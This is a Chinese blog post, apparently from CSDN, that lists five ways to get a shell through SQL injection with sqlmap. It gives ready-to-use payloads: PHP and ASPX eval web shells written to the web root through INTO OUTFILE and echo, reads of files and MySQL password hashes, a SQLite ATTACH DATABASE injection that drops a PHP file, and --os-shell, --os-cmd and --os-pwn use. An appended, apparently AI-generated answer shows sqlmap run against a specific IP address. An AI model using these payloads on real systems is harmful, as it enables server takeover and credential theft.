sqlmap拿shell

sqlmap5种思路拿shell总结

①利用dump 管理员类的账户后进入进行站点后拿shell
或者拿到账户后远程连接进行连接进行udf类提取类拿shell
#连接方法
sqlmap -d “mysql://admin:password@192.168.1.1:3306/security” admin是账号,psw是密码,后面是地址和端口,security数据库。我们数据库可以用current-db来查看

②利用os-shell 
拿shell
条件①知绝对路径
    ②管理员权限
    ③开启
③利用sql-shell拿shell
条件:dba权限
思路
select host,user,password from mysql.user 读取账户类
select load_file(’/home/wwwroot/index.php’)   
select '<?php @eval($_POST[a]);?>'INTO OUTFILE '/home/wwwroot/default/p.php’
写马

④利用os-cmd拿shell
条件
dba-权限
xp_cmdshell开启
如下
判断方法
--os-cmd=whoami
⑤--os-pwn
结合msf提马

在这里插入图片描述
获取绝对路径方法

①sql-shell方法
利用读取配置文件去获取
②os-shell方法
dir /s /b d:\"aa.txt"

写马

①基础的写文件到txt中
echo “thisis test”>d:\matata\t1.txt
②写马到目录文件中
echo ^<%@ Page Language=”Jscript”%^>^<%eval(Request.Item[“pass”],”unsafe”);%^> > d:\matata\test.aspx
#注意 有时候会出现找不到路径的问题
原因:①目录被限制不能写文件-->典型宝塔的权限为777类型chmod的状况特点

可能遇到的情况
在这里插入图片描述
原因:①中文路径的原因
②可能是注册表的问题
原因

从sql server注入到getshell
os-shell爬坑
mssql注入实战总结之狠快准绕
注意:oracle数据库 只支持sql-shell命令

oracle利用java反弹拿shell

特殊:sqlite数据库拿shell

方法一:进入后台去拿shell
方法二:手工注入执行下面的语句拿shell
sqlite aspx拿shell分析以及方法
php拿shell方法

在注入点处执行以下的代码 
'; ATTACH DATABASE '23.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo()?>');

然后生成一个23.php的文件就可以直接访问phpinfo的文件

在这里插入图片描述

  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
要使用sqlmap来获取shell,您可以按照以下步骤进行操作: 1. 首先,确保您已经安装了sqlmap,并找到了其安装文件夹的路径。根据引用中的信息,Windows版的sqlmap将注入的URL保存在C:\Users\Administrator\.sqlmap文件夹下。 2. 接下来,您需要确定要注入的目标URL。根据引用中的示例,假设目标URL是"http://59.63.79:8804/single.php?id=1"。 3. 打开命令提示符或终端,并导航到sqlmap的安装文件夹路径。 4. 使用以下命令来运行sqlmap并开始注入测试: ``` python sqlmap.py -u "http://59.63.79:8804/single.php?id=1" --proxy=http://127.0.0.1:8080 ``` 请注意,您可能需要根据您的具体情况调整命令中的URL和代理设置。引用中的示例命令使用了一个代理服务器,您可以根据需要修改或省略该选项。 5. 运行命令后,sqlmap将开始分析目标URL,并尝试进行注入测试。您可以在输出中查看sqlmap发送的测试payload,根据引用中的建议,将日志级别设置为3可以看到最详细的信息。 6. 一旦sqlmap发现注入漏洞,您可以使用其提供的各种选项和功能来获取shell。具体的步骤和命令将取决于目标系统和注入漏洞的类型。 请记住,在进行任何安全测试或攻击操作时,您必须始终遵守法律和道德要求。仅在授权的情况下、用于合法目的和测试目的使用sqlmap或类似的工具。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [sqlmap之sql注入(二)](https://blog.csdn.net/m0_55313512/article/details/123171919)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值